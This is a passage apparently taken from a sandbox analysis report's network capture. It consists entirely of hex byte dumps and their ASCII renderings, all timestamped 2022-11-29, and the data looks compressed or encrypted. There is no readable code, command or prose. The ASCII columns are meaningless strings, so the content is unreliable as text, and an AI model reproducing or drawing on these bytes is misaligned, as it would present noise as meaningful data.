80 0c af 85 8a e2 83 79 91 04 8e 32 b2 f5 df 04 6d 34 b0 cd 7a 05 78 dd 47 fb 46 14 36 7a e0 a9 2d 34 5b cf 46 53 cc af 4b 47 88 a6 9c aa 0a 8d 7c 74 93 f1 66 94 ac 4b f8 a9 cc b3 52 0f c7 fa df 83 7a bf e7 6b 6f
                                  Data Ascii: :ZC?d$U{8I pi!?hR]019WXeB;tO:^B(?3W$,#X80_0pcJwD9"Lqa.9BnkSvKQYd*LfbM,- ]y2m4zxGF6z-4[FSKG|tfKRzko
                                  2022-11-29 15:55:23 UTC1873INData Raw: 01 a5 7e c3 c4 f7 aa d6 f6 32 f7 c4 df 22 2c a8 8f 82 99 16 48 fd f0 61 64 00 11 a9 d7 d2 f0 b4 31 96 7c ff 43 c7 45 a8 5e 57 a9 4a 23 f4 90 eb f6 42 61 52 9f 08 91 30 72 a2 39 1f 49 6c f2 3e 83 5a 7d 43 25 0c d7 d9 22 7a 68 82 b8 28 a1 10 86 36 9a 65 ad 02 a1 cc 1f f4 e1 a3 61 73 33 a9 9e 25 bc 94 0c 71 17 30 9b 2f 17 22 12 75 31 81 8d 00 1c 42 84 d8 5e bb 12 93 a7 3d 1c f4 1a 83 91 f8 cb 02 22 bc fa bb 04 aa 3d 73 41 ae 79 8b 3b f8 ab fd eb 26 1f 76 ae 28 59 84 c2 b5 e6 b9 58 3b eb 96 66 4c 6f 71 80 97 49 7e d2 cf a7 4f 64 40 27 45 41 95 41 66 cd a7 66 90 79 22 6d 45 1e 79 1d 3b 67 86 3d 6b e5 cf b4 9f 47 71 33 cf 5c a2 c1 8a 15 66 de 5a 92 a7 70 ec 6e 08 8c df 00 98 cc c2 98 35 0b aa 85 5a b2 ac 25 d6 ab 0d e9 92 7e ba 6a 50 08 29 50 fa 29 14 3e f4 f7
                                  Data Ascii: ~2",Had1|CE^WJ#BaR0r9Il>Z}C%"zh(6eas3%q0/"u1B^="=sAy;&v(YX;fLoqI~Od@'EAAffy"mEy;g=kGq3\fZpn5Z%~jP)P)>
                                  2022-11-29 15:55:23 UTC1889INData Raw: 11 b1 0a 46 b6 db f7 c8 9d 84 4d 42 a8 46 f9 66 54 6a db e0 d3 a0 55 78 e8 c4 81 23 d8 af d0 31 35 d6 72 92 43 97 05 2f 27 4e 7e 35 12 03 b3 9b 69 e2 7a d1 1b 80 ad 58 4e 23 81 45 52 5a f3 c5 0b 19 db da d4 e7 9b 1e 9c 98 41 bb 50 e3 cf b1 fd 2a 4f ae 7d 2e f7 3c 14 8a 70 10 e9 aa a0 d3 68 75 8f b0 8c e5 51 16 a4 2e 1c f0 b8 52 30 96 6a 7f f2 e2 0a 45 52 77 7f 8c d5 61 9a 0d 78 3f 39 dc e7 be f6 18 d7 1b 86 8e fd 7e 87 61 c9 a8 10 22 e2 5a 63 31 57 76 64 58 76 5c c2 29 51 8e ba bf da e6 d0 6b 11 fc 70 9c ae 92 60 4b 2c 3d df 18 99 37 f6 65 eb 16 d9 17 24 82 03 5d 16 c2 5c 4b 9c 2c 27 23 63 8d d4 09 40 fa 26 aa a3 19 ca b0 0f 80 4f 29 12 62 2c 81 36 af 6a 0d 75 c0 d0 86 c9 56 d9 ee 85 34 21 24 27 58 15 9d 52 54 eb 47 59 2a 58 d1 32 d7 c2 c3 26 13 52 6e 61
                                  Data Ascii: FMBFfTjUx#15rC/'N~5izXN#ERZAP*O}.<phuQ.R0jERwax?9~a"Zc1WvdXv\)Qkp`K,=7e$]\K,'#c@&O)b,6juV4!$'XRTGY*X2&Rna
                                  2022-11-29 15:55:23 UTC1905INData Raw: af 9c 3a 95 02 c5 e5 dc 62 be 5c 6b 19 df 66 c3 13 50 88 5a 5a b8 64 86 57 be 88 54 77 6b 21 dd f0 95 b3 b1 61 d7 1f 26 07 85 dd 1f e7 83 ea 72 ab 3d 76 0d f9 af c5 72 2e 2d 52 2b bf 14 86 6d 73 49 d1 ff 3a c9 f0 19 bc 16 5d fa 20 7d 02 e5 2f 70 25 bc 1e 06 b5 77 89 01 9b 28 d5 2c 55 af 6e f8 b2 83 e5 a7 7b 7d 88 ad d7 e8 2a 5a e1 76 bb 16 fc 1a 47 55 8a b1 75 02 50 3d 48 52 94 ab 89 21 1b d1 01 ce 47 6f 53 fb b6 54 9b 80 f0 b2 10 73 71 cf a8 b5 d2 d2 ff cd d9 09 aa 35 bc 7a 6b 36 65 9d 4c 56 32 fb b3 ec 0a 59 e8 02 91 26 4f 27 0b ee 9f 11 d0 82 f0 14 4f 76 d6 ac 4b a4 8b ad b5 08 57 4c c1 15 e0 71 92 80 68 10 12 95 bc aa 04 cb a3 28 67 3d 50 3a d5 de 08 1e 52 ba 78 fb 77 11 b0 1f f4 d9 01 b4 b0 12 97 d9 81 e4 da 3b c4 96 aa 2a 72 76 85 a5 8e d3 9d d6 2d
                                  Data Ascii: :b\kfPZZdWTwk!a&r=vr.-R+msI:] }/p%w(,Un{}*ZvGUuP=HR!GoSTsq5zk6eLV2Y&O'OvKWLqh(g=P:Rxw;*rv-
                                  2022-11-29 15:55:23 UTC1921INData Raw: b2 de 3a 73 fe 8c ef 68 02 de 80 f0 3b 02 be 4e 39 03 ea 84 bc aa 0d f2 33 b2 83 32 8b 00 9d 3b 32 19 9a 87 83 33 66 27 86 e0 94 4e 8f 0e 2f b8 e3 52 7c bd 35 66 f1 6a e0 5b c9 ca e6 04 89 87 33 a3 05 39 de 74 b9 f5 09 67 6f ca 6b 3c 30 c3 9c 04 d3 52 3d cb 87 b3 b5 e2 10 aa ac 07 f4 8b ac a1 ae 9f 50 39 1f 44 bc dd 3f b0 8f 01 70 a1 4c 40 ca 88 d0 0a 04 51 74 b3 47 a1 fb 18 15 10 51 ff d1 c1 a7 f7 e3 2c 5b 9c 4c 24 ac e5 f9 d3 4c cb 24 74 03 86 a3 f9 72 c4 2d 10 4e ef 67 39 bf 03 6f 54 52 49 39 d1 e9 ed fa e6 ef 17 be c4 99 a8 00 07 de 41 64 6d 8b 15 5b 9a 99 94 9a cf 04 7a 2d ac 5b 72 f6 4d 0e de 69 ab 2e 80 46 1c 8d 62 75 9b 0e 59 03 0d c8 1d 28 44 16 43 2e 64 20 c2 8f 3a fc ad 4f 12 d3 3c 14 f7 1a e1 48 e1 5d e8 97 ee e2 9a c1 1b 6d b5 f2 fe 77 00 3e
                                  Data Ascii: :sh;N932;23f'N/R|5fj[39tgok<0R=P9D?pL@QtGQ,[L$L$tr-Ng9oTRI9Adm[z-[rMi.FbuY(DC.d :O<H]mw>
                                  2022-11-29 15:55:23 UTC1937INData Raw: ee 0f ca 65 84 66 a1 e5 e6 24 1b 4a a8 41 5a 58 dd e5 d6 9d 72 d9 24 69 7c fd 24 c9 5e f0 4b a8 22 c1 fe e8 d0 3b 7b 7d d1 26 72 38 86 2b 79 70 7f 8c bf 6d 00 20 cf 9e 56 08 f6 f4 57 73 d6 a2 65 44 68 56 ad a8 5c c0 24 04 38 a9 0d 94 8e 98 8b 00 0c 9c 5f 69 aa ae 44 5f 39 b3 6a 62 a7 61 7b 50 13 7c af 3a 04 60 0e 65 a8 c2 27 09 0d 07 a9 e7 67 41 70 95 e3 5e 39 bd 55 38 04 87 78 3e b7 eb 0f 1d 81 d7 7a 13 d3 7b bf 2f e6 0e 87 23 d4 c9 ef d2 2e 37 d6 09 45 4b 14 92 e4 a4 07 c6 28 5a 72 ba 86 ba 44 cf 20 0a b0 b6 9a ea c0 d9 42 a9 b7 65 5f cf 24 98 e3 2f 56 af 22 d9 a2 0d 51 ad 4d 43 a6 7a 07 b8 21 3d 8a ff 31 da d4 27 e8 1e 70 03 90 fd 02 8a 88 ec 6c 30 26 04 3c b2 f7 9b 17 fc 67 92 80 63 07 78 a6 41 80 a8 eb 25 23 e2 7c aa 0c fe 51 cb 7d eb 2e de c7 22 29
                                  Data Ascii: ef$JAZXr$i|$^K";{}&r8+ypm VWseDhV\$8_iD_9jba{P|:`e'gAp^9U8x>z{/#.7EK(ZrD Be_$/V"QMCz!=1'pl0&<gcxA%#|Q}.")
                                  2022-11-29 15:55:23 UTC1953INData Raw: 32 9d d8 c9 9f 84 5f 39 54 84 1a a1 76 c2 aa 7d 2f cb 08 26 54 0a 35 22 6a e0 b0 6f 46 a3 88 bb 04 b0 50 3e 20 c2 66 b5 4a 95 95 62 63 96 59 db 5d ee 8b 7b 88 39 84 6d 04 42 05 e9 f3 2e 46 23 60 f2 0e 40 db d0 15 0b d7 9d 52 59 6e 86 0f 41 a5 16 ae bf 82 f5 69 e0 b0 8a f8 dd d1 48 3b 99 85 76 23 c0 da 3d 55 c3 8d c8 9a df 4c b0 82 2b 4d 4a c9 49 8f 36 5a 77 f4 c1 46 6e 36 bf 0c 75 43 4c d2 31 aa 41 a2 02 07 0e e2 18 7d 6e 75 eb 10 aa 31 fb a4 0b fe 79 ab a4 51 67 0d 5f 09 3b e5 71 6b 1a ea 7e 08 c7 91 d3 2b 31 b9 22 48 52 f2 0d 1d ae 8b d8 46 59 6b ca 1a 9a d2 b5 8b 7b 5b d2 07 cf 90 44 4a 25 69 ad 27 ba 3c ec f1 99 95 91 e0 fb 85 a7 e9 f7 9a 58 6d f0 e0 61 f8 0b 25 c3 c2 18 8f cd cb a8 a3 86 c1 02 35 c8 96 69 9e da fe 11 13 b1 c7 e1 d0 4b 08 e4 89 72 27
                                  Data Ascii: 2_9Tv}/&T5"joFP> fJbcY]{9mB.F#`@RYnAiH;v#=UL+MJI6ZwFn6uCL1A}nu1yQg_;qk~+1"HRFYk{[DJ%i'<Xma%5iKr'
                                  2022-11-29 15:55:23 UTC1969INData Raw: 23 cf 3c c4 63 6f 66 2d eb 80 56 a0 82 e8 38 9c f8 e2 da a2 cd 94 59 5b bd 64 29 2f 38 ec 70 ae c8 13 5d f9 d8 af 1a d8 7d 9b ac f1 09 bc c1 52 94 85 29 3f 98 72 68 40 4f 59 96 6e f4 1d c9 ee e8 c9 4a a2 ff 95 15 f4 2b 7d ae 4f c5 d7 fc fa 9f 2d 2c 7f 6f c6 f0 3e e1 dc 32 bc 9c 31 f5 3a d7 e1 13 59 5e af 0b c7 f5 32 2c 05 5b 11 1f b7 38 a9 14 96 62 0e 8d 7e 5c 99 b8 06 3b 35 c0 cd 2b 88 2a ad 0d 05 12 03 02 5a 80 1a 1f 8a 60 61 0c ed 08 99 1c 39 6b 70 67 63 3c d7 21 10 ae a7 90 08 fd be c3 8a 68 d8 a2 4d b7 b7 5d d9 c9 75 36 5b 20 c1 be 56 2e 1f 83 d5 d7 5e 4e 6e 48 16 8e 52 68 a6 86 80 28 4c e8 c2 3e 5a 0d 8d 3c 38 77 d8 8f ca 6d 8f 8e 55 40 c1 e3 c8 80 66 c3 44 60 de 7d f2 e8 76 de fe 77 d6 ca 02 0a df d1 fb 68 2e a0 5d 8e 9c eb 5d 5e 2b 94 d9 4a da 34
                                  Data Ascii: #<cof-V8Y[d)/8p]}R)?rh@OYnJ+}O-,o>21:Y^2,[8b~\;5+*Z`a9kpgc<!hM]u6[ V.^NnHRh(L>Z<8wmU@fD`}vwh.]]^+J4
                                  2022-11-29 15:55:23 UTC1985INData Raw: 3f 23 90 6c 87 24 ae a5 62 1f 2b 79 d2 f6 09 89 5d f9 c9 7d a0 5c 40 c1 d3 5e f1 d5 9e 74 6a 41 c0 46 61 be a3 46 0c 83 07 4b 9e 6e cc 39 80 51 a6 67 da 4a fb 37 1d db 45 ab a1 36 7e a0 22 a6 4c e6 88 3e d4 09 d9 ab e6 12 e7 79 e2 51 ed ff da 4e f4 84 b6 ef 33 d8 e8 08 0c 82 fe f0 49 73 b6 f2 f5 fc a3 99 18 40 e8 a9 25 30 fd 94 94 46 35 ca 71 13 f5 b3 e0 ef 13 b3 f7 6c e8 e9 2d f1 3b 97 a2 69 53 ff 6e 06 7c 6b a9 a5 c1 68 66 5d 23 9b 97 39 15 d3 94 1c ba c9 45 dd 9a 55 a9 20 b3 59 6d 91 51 a3 a5 d6 ca e3 3f 9e 48 17 f8 da 35 7a 61 42 c2 f4 ad fd 40 23 28 5b 58 b5 84 60 2a 8f 25 5f ce b5 54 69 84 0e d0 69 bd 83 57 a5 d7 73 bd 6c c4 86 12 d5 df b0 a4 b0 2a 99 10 72 67 1d 03 50 01 38 76 6b 41 7f 62 7f 06 1f f0 a0 d6 e2 f7 8b 70 a9 bd 5b af d3 a6 69 f1 65 60
                                  Data Ascii: ?#l$b+y]}\@^tjAFaFKn9QgJ7E6~"L>yQN3Is@%0F5ql-;iSn|khf]#9EU YmQ?H5zaB@#([X`*%_TiiWsl*rgP8vkAbp[ie`
                                  2022-11-29 15:55:23 UTC2001INData Raw: 05 9d 0e 75 da a4 47 df 6d ad a7 2e fd 09 5b e9 72 a1 f5 48 e0 13 53 cc 36 16 ad b0 9d f2 a3 8b 22 ba c4 8b dd 3f bb b4 52 5e 8f 48 f3 b0 ec 3a e3 17 17 43 5a 4d 5f 70 f7 40 69 dd f6 4b 41 90 ff 91 58 c5 9c ae 6d 2a 1d f9 6c 28 88 30 2a ce 81 d3 42 77 ee b1 92 d4 1f 7b 4e d2 4f 54 f4 e7 22 b2 fc 1e 5d ec 89 5d 1a 58 81 e5 48 ce 8b 37 92 e6 a6 38 ac 2f 6d fa e5 29 a2 21 5c 06 91 d3 39 11 f3 74 61 8a 81 4d 6b 11 00 f6 42 4a 8e 43 da 10 c8 f7 e0 aa 04 19 f6 6d d3 4d a7 cd e8 d8 95 f1 1b 15 df f5 23 cb 3c 99 8a e1 2b 9f ec bd 9f 21 00 35 85 60 4e 19 95 36 8a cb 8c c5 23 31 b6 9e 9b 67 86 98 3d 2d e7 85 23 5c 23 ba c2 b8 66 f1 58 15 e8 71 98 ce 3a 32 56 9a cb f6 98 6f 6c 75 85 be ef fc b7 ea b8 e4 b7 3e 42 4d c7 5f 66 a3 09 5e c1 7b 74 23 2e 77 6a 35 e2 2f 9e
                                  Data Ascii: uGm.[rHS6"?R^H:CZM_p@iKAXm*l(0*Bw{NOT"]]XH78/m)!\9taMkBJCmM#<+!5`N6#1g=-#\#fXq:2Volu>BM_f^{t#.wj5/
                                  2022-11-29 15:55:23 UTC2017INData Raw: 16 8b 78 23 81 f5 86 38 9d 5a 15 0b 9a fb 36 b3 3a 5f ad a1 b5 84 cd 52 2c c3 5d 02 d2 91 9b df e6 4a 7e f5 cb 33 7d 3b 85 a2 8e 7d c6 2a d9 62 10 c1 c7 00 f4 4b 91 04 fb e6 34 6c c8 a7 fd 9f 36 38 e4 ae f4 71 15 52 c9 6b 2d d3 7d 79 9f 2a 2b fa 17 bf 02 8a 33 05 cc 50 f0 aa b9 b7 35 64 9c fc 20 e8 8d 2a d6 29 92 4d 6f cb aa 17 3e bd d1 ee 2f c1 16 34 e2 fb d5 a9 9a af 65 a7 3e 82 1c 78 ea 8a 9e 08 63 3f 5a b9 1b e8 45 39 a6 6a f6 7a dc 88 13 13 90 2e 24 6c 2d 39 f3 ce 16 8f 06 00 1e b5 7c ef 14 30 98 af 2e 40 2f de 91 db 13 0f a3 86 f9 02 4d 67 53 5d 13 4e 7e cf bd e3 7c 7c 08 87 d6 9b 63 de 08 1b b6 b3 af 50 92 e5 2a 40 c4 05 fa 28 69 f7 8f ff 76 59 58 10 fb c6 8e 13 09 d6 27 c9 34 51 e5 73 0e c9 56 8c 42 e8 a0 87 2a 33 c6 a5 b1 51 d5 34 bd 1f 29 bc af
                                  Data Ascii: x#8Z6:_R,]J~3};}*bK4l68qRk-}y*+3P5d *)Mo>/4e>xc?ZE9jz.$l-9|0.@/MgS]N~||cP*@(ivYX'4QsVB*3Q4)
                                  2022-11-29 15:55:23 UTC2033INData Raw: f8 b7 67 25 3f 89 8e a8 5c e6 bf 08 8a ae 97 20 e8 82 cf f0 53 e9 ae 2f 38 65 61 f5 99 34 be 9e ad ef d3 a3 10 22 ef 38 52 bc 0e 91 67 0d f8 74 60 9a 25 02 6a 07 dc 65 4f 54 ca dc 61 1b 38 d6 55 e3 0d 81 87 72 79 88 1b cd 91 28 cc af 28 6d 50 00 04 2f 47 f8 ed ce 14 7a 84 85 dd 52 5a 72 6a 00 94 40 bc c6 72 5c 00 72 0a a7 d5 7f 19 27 10 bc a7 f4 b0 d3 03 e9 21 76 0d 69 cf 61 e7 99 a1 82 6f a6 93 ba 3f c7 d9 1e fc 5a 1a 38 e6 6e b3 7a 8f 72 84 3c 4a 46 3b 18 85 63 fd 9b 17 d8 32 e0 09 02 46 d3 32 dd 6b 27 51 f6 56 93 61 71 13 cd 52 c0 89 de 1e b0 8d 69 f1 53 e0 bd 1f a1 0f a8 cb ac 81 82 04 57 3a a5 d9 03 71 82 59 a7 d3 9a 61 9c d0 42 d1 c8 b4 98 15 6b 2a 01 3a 89 8e 2e 3c 87 c0 2b 8d 24 22 94 c3 9d 1c 4b 30 17 09 f3 4f 06 34 b0 b1 d5 5f 7e 0e 9e 38 10 74
                                  Data Ascii: g%?\ S/8ea4"8Rgt`%jeOTa8Ury((mP/GzRZrj@r\r'!viao?Z8nzr<JF;c2F2k'QVaqRiSW:qYaBk*:.<+$"K0O4_~8t
                                  2022-11-29 15:55:23 UTC2049INData Raw: 29 66 55 0b 25 b5 3e 55 65 d6 bc e2 97 26 ea b3 39 e5 ca 41 ff 1e 1d c5 0c 1d 4f 55 37 fa b8 72 db 01 4d 76 aa bd 1f ea 3d 8a f4 a6 fe 8d 1a 98 d6 c3 a0 55 1a 96 09 b0 ec 60 21 01 d3 53 96 20 de ce fb 84 69 ed 4c 90 62 31 d8 8f 8a 51 d0 96 2f 85 26 f3 1c ee d2 fb 9d 28 f7 97 d0 ec 73 ae 33 0c 0c b4 39 d3 97 61 b6 82 99 77 20 86 ba 69 af 2a ab c4 fa 10 0c dc 90 42 4f d9 f5 8c ae 6e e7 be b8 ef be 96 06 8a 0e 7d be 45 dc e1 53 f1 ee 5a d0 d3 8f 74 9f be 78 e1 a1 ea 68 c5 c7 f1 35 b7 4c 95 2e 91 81 7b 4b 03 6e 70 bc 24 1e 6b c7 53 c1 c6 a9 66 bf 27 e9 5b f8 77 ef 41 11 0d 8f fe ab 42 d1 b3 e5 a7 3c 6a b3 3c 39 1b 9e 81 83 0f 88 2a 48 8f 6e 50 4a 4d f4 be b3 8d cd 27 f2 e1 50 53 22 47 fe 44 a2 c5 27 a1 93 8a 26 17 e1 6c 5b 40 7c e3 82 db ef 6e da 66 fb 6b 97
                                  Data Ascii: )fU%>Ue&9AOU7rMv=U`!S iLb1Q/&(s39aw i*BOn}ESZtxh5L.{Knp$kSf'[wAB<j<9*HnPJM'PS"GD'&l[@|nfk
                                  2022-11-29 15:55:23 UTC2065INData Raw: e1 d8 e1 8c d4 c9 cf 34 f4 fc 99 b1 f5 a8 1d 4f 6e 3f 14 9f 39 f0 e2 ca 8c df 23 00 01 e7 b3 2a 34 4f b0 6f b1 11 21 25 72 67 c8 a7 ce 6d 76 1c 32 27 4f 63 2d fd 4d 2b cb 35 8d 1d c1 66 0d c8 ae 0f 62 47 2a 93 7e 00 1a 5e 9d 88 59 9a 85 ff 26 68 a1 47 b3 c5 f0 56 f5 f2 a7 1b 3a 1f ae 1d f7 33 7b b9 cd cb 40 c3 aa ef 1a 1a b9 b6 2c cb e5 29 8f 41 77 c3 53 7f 8c 89 f7 d9 8f 3f 62 84 20 25 37 7c 1c 63 4f a4 1b 8a 8e 20 30 5d 55 41 95 f9 83 ab df 53 35 c1 03 bc 38 42 5f 12 dc 39 8f b2 c3 7d d6 f6 a7 17 6c bb 56 93 08 da ca c4 52 31 23 a2 90 3f 3d 00 f9 db 35 f7 1c b6 36 ea 04 4f c8 29 23 9f 8e e7 ec 60 7d bb 11 00 ea c9 34 73 53 cf 67 5b 62 89 35 1f 9d 84 c2 d0 27 c3 de 47 5f 27 54 70 aa af 3e 76 b1 c1 0b c4 6b ee 7d 24 13 14 c2 56 20 fc 77 aa c2 00 52 38 d1
                                  Data Ascii: 4On?9#*4Oo!%rgmv2'Oc-M+5fbG*~^Y&hGV:3{@,)AwS?b %7|cO 0]UAS58B_9}lVR1#?=56O)#`}4sSg[b5'G_'Tp>vk}$V wR8
                                  2022-11-29 15:55:23 UTC2081INData Raw: db 4a 1b e7 a2 ff f4 23 ce 40 70 3f 33 89 09 dc 84 ad c6 e1 71 af 11 5c 35 ae 03 fb 80 57 f5 ca d0 55 03 85 62 53 5d a4 df 07 61 13 3e d5 c4 3e a7 22 71 40 99 bd 37 da 02 6c da e7 55 0c 2c 5e 7e b3 c0 8d fe 34 9c bb 05 fa ef 4c 6b 6d 1b c8 4b fa 49 f7 c9 89 6a b5 e9 b0 36 be 9b be 88 43 aa fc 6b d8 84 e8 10 80 45 ea d0 c7 8a ed cd 49 eb 5f 3e 40 11 9f db d8 80 b3 ef 41 70 75 91 2c 5f 11 25 83 15 11 75 9a d9 6e e1 85 23 19 db 5a e7 be be 8d 8a c8 ef eb 0a 02 e9 49 4c 3e f2 b1 f2 0d b2 b1 7a 43 38 9d ff fe c4 40 20 96 e9 56 71 b7 83 1d b9 84 fc 23 4f f1 3a 37 a2 77 1e 09 54 5f 5d 6a ad c6 18 b7 42 16 7d cf 9d f5 6e 71 83 1a 9b ba 98 15 7e 63 68 3a 18 0f 9e 95 3c 10 83 c8 ae 6b 0e b4 8e 2e 4f 2f af aa b2 6b 7a 52 17 e1 7a d3 52 3d f8 28 d1 ae 63 12 22 e1 0d
                                  Data Ascii: J#@p?3q\5WUbS]a>>"q@7lU,^~4LkmKIj6CkEI_>@Apu,_%un#ZIL>zC8@ Vq#O:7wT_]jB}nq~ch:<k.O/kzRzR=(c"
                                  2022-11-29 15:55:23 UTC2097INData Raw: aa 82 dd cd 84 ff dc 07 45 12 8f 74 3e 1a 39 6e 87 94 ee cc be f1 17 71 75 52 ed d3 f4 23 a0 a9 8d e3 74 f8 26 2f 16 5c 8b 8e 1b ac 07 6e 57 d1 4e e7 bc 86 6d 12 e2 9c f7 a7 28 a9 49 95 ba 65 cb d4 6c 4c e9 50 49 99 5e 80 98 70 f6 bd 01 03 8a f8 1a 48 77 b2 8c 17 9a d4 7a ed f4 0a 3f 0b f9 3b 00 03 f0 01 8d 78 9b 45 a0 07 45 4a cb 6f 31 e9 b5 75 be 38 f5 6f 09 ec d2 22 61 2f 53 b5 0c dd 92 27 ca 19 c1 10 18 95 0e 8c 08 7d b0 a4 d5 f6 17 28 56 77 8a 18 9a 6d 29 3b a1 6e 60 01 ca 88 85 d9 fd b1 19 72 33 25 b7 9a c1 b7 94 3b 09 3d a4 41 c0 a1 80 20 3c 9f f7 8a 1c 07 c7 19 c3 7e f5 00 b6 b9 e4 77 a5 fd e8 1e 55 bd dd c9 4c f4 2b fe 42 d6 26 b2 23 36 64 9f f4 04 a3 25 f3 e0 52 76 1e 1f 8b 2d 54 c3 3c b1 b4 24 63 38 a4 38 12 27 dc 3f 0c f6 07 f0 0d 72 f2 ff 68
                                  Data Ascii: Et>9nquR#t&/\nWNm(IelLPI^pHwz?;xEEJo1u8o"a/S'}(Vwm);n`r3%;=A <~wUL+B&#6d%Rv-T<$c88'?rh
                                  2022-11-29 15:55:23 UTC2113INData Raw: 11 34 ff ab 32 47 66 7c b5 cd 05 26 be 85 7c 84 6a 29 6d f4 bc 67 4b 09 82 31 f4 7c cf b9 c2 65 4d 98 af f8 3a cb 4d 6d 8d 5f 92 1b 26 bd 86 77 3a 02 a9 a4 fc a0 15 5e 98 8c d7 9e 91 af 29 18 68 0b 75 03 33 b1 43 19 20 e0 93 97 1a 39 29 73 b0 75 34 c5 c1 b6 e1 4a e4 dc 3e bc 65 f1 2b 3c 4f c2 7f 7e 26 df 83 85 bf 51 24 38 fe eb 8a 72 ab cb 29 39 f4 ad a9 7a dd 72 3e 6a e9 80 98 a7 c2 21 12 7c 08 88 03 94 db dd f6 b2 36 65 a5 84 8a d7 be 71 67 12 fa 8a 16 a8 6f b5 25 13 4c f1 05 88 eb 18 7a 76 64 94 42 9e f6 60 83 47 7f 0c 0d fc 9f a4 89 ce af 14 5a 88 52 9f 6c 00 70 9c 27 e6 39 cc b9 ec 17 52 9a 95 b7 de 9e 26 9c 48 eb 40 3a f2 36 46 5e b4 1a 62 f6 e8 5a 40 bb 36 27 7d bb 7e 33 98 f7 3a ef 45 11 43 42 e6 48 3e 84 fe 11 d4 6a 02 33 52 11 40 4b 45 fa da e9
                                  Data Ascii: 42Gf|&|j)mgK1|eM:Mm_&w:^)hu3C 9)su4J>e+<O~&Q$8r)9zr>j!|6eqgo%LzvdB`GZRlp'9R&H@:6F^bZ@6'}~3:ECBH>j3R@KE
                                  2022-11-29 15:55:23 UTC2129INData Raw: f3 53 6d cd 89 8d 87 c3 0b 3b 05 d2 35 a2 cc 23 1b d0 79 d0 eb be 71 8f ca 56 d4 44 e0 80 aa 60 ae ca 0b 51 8c 5e c8 3d 0f 39 7a 08 6f 6c 6b 2a 7c ef be 0c 55 9c c8 1d 9b 20 0f 28 56 29 f4 ca 1f 16 0d 40 c1 e7 76 09 72 a9 da 1c 32 74 aa 85 e9 a6 c7 79 cd e1 30 d0 b7 a1 14 f6 7b fe d7 28 3b e9 f2 a0 f0 bb 00 f3 3f 8b 88 43 88 32 82 5c 48 5c 23 0e 6b 0d 69 c0 4c 9e 43 5c b1 fb e8 29 72 56 8f b3 2e 12 3f 62 a4 13 0f 8c 76 92 f9 4e fa 30 b7 ef 02 8c 5b 61 d2 15 66 cb 87 86 c1 b9 7e 9c 69 7a 08 63 74 99 93 e5 9b f9 e6 20 d7 4f 56 73 9c 1d 2e 90 d0 39 1a a9 60 b5 c2 94 2b 97 4c d6 1f e0 b3 ac 71 00 ca b1 20 c1 76 b1 d6 e2 4e cc e4 90 2a bb 56 fe c0 f6 20 b4 0a ed 92 01 53 d3 0e 4e 92 39 b4 e0 ff da 9a db 71 4f 10 49 64 9e 55 fc 7a 81 93 de d3 00 65 1a 29 1c 33
                                  Data Ascii: Sm;5#yqVD`Q^=9zolk*|U (V)@vr2ty0{(;?C2\H\#kiLC\)rV.?bvN0[af~izct OVs.9`+Lq vN*V SN9qOIdUze)3
                                  2022-11-29 15:55:23 UTC2145INData Raw: 82 32 d8 96 e1 15 21 69 92 32 33 23 4b 84 75 37 48 db f3 b8 74 4a b0 cc 44 40 1b 53 6e 6c c4 ea 4e e4 3f e7 80 ee a0 77 e0 15 3c cc 5f 00 1f 1e 64 c3 81 b1 62 c7 c6 7e d4 08 a3 06 29 ad 9b e8 25 36 84 90 b9 91 6c 0f 63 96 a5 01 70 67 b2 d5 38 58 c3 8e 03 43 fc 2f 93 50 f2 1f f7 b2 08 17 00 5e 06 d1 47 a5 2a c4 b7 ff ab f5 4a 61 b5 d2 9c f2 dc a9 d1 7b b2 b4 ab 80 70 14 bc 5f ef ea 0f 35 d9 5b 81 79 4b 4b 89 56 9e 77 9e 5c 58 09 ff 3b a9 89 14 b4 d5 5e 5a 37 3c 2d fe 0f d8 8b 00 68 72 50 ba 79 b9 b0 a4 09 f7 bc af 69 c5 23 fc 6d 65 f6 59 53 b0 90 77 b3 ab 97 60 da e4 06 9f 7d 03 49 88 cb 50 3f 41 9c e3 81 2e 15 a4 83 13 48 7d 42 f4 5b 36 51 4b 98 c3 d2 dd 84 d3 16 6d a7 af b9 8a 1a bf 19 68 1d db e0 36 c0 03 63 d9 60 d2 14 a2 5b 4f 52 72 7b f7 80 fa b2 06
                                  Data Ascii: 2!i23#Ku7HtJD@SnlN?w<_db~)%6lcpg8XC/P^G*Ja{p_5[yKKVw\X;^Z7<-hrPyi#meYSw`}IP?A.H}B[6QKmh6c`[ORr{
                                  2022-11-29 15:55:23 UTC2161INData Raw: 60 83 8a 83 11 70 97 12 70 52 96 c2 bd 78 10 ec b4 44 f5 e8 14 bd 4f 58 91 38 50 29 96 c5 5e a9 8c 29 ac 2a 5f 70 55 77 a9 15 fd b3 5a 8a b1 31 f2 80 70 ad 31 6d e9 35 d0 69 9d ea aa a2 6d 7f a5 f6 ea aa 78 af 59 c7 b7 cc 7e 74 c2 6b fc 56 ad 42 02 44 b1 de fd eb 2f fc 68 53 42 7e b7 42 86 b7 d9 83 24 72 83 34 fe 8e 45 83 27 ba 70 9f 92 de 3b ff 9b 2a 62 1a 03 04 31 ac 3f 22 de b9 9f 1b d9 7f a0 b2 83 c0 ea 82 00 e2 f8 6d c5 95 6a 5f 55 b8 ba 9c 08 d4 4d 04 d1 aa f2 1f b9 46 71 11 eb fa cb e6 ba 19 1f c5 78 d8 38 4f f2 fb b8 60 ef 3f 38 99 0d 5b be 58 b5 3d ea 4e 4d 13 54 e3 5e c5 38 79 e9 3e 79 5b 9c 09 f5 a7 23 85 99 61 7d e8 11 af 74 45 d9 9b 14 9f bb 9b e5 3e a1 a2 ad 95 1b af 84 69 dc c1 a0 6a f1 83 45 89 cb 06 b7 0b bf 38 9a c3 9e 46 fd 10 68 ac 82
                                  Data Ascii: `ppRxDOX8P)^)*_pUwZ1p1m5imxY~tkVBD/hSB~B$r4E'p;*b1?"mj_UMFqx8O`?8[X=NMT^8y>y[#a}tE>ijE8Fh
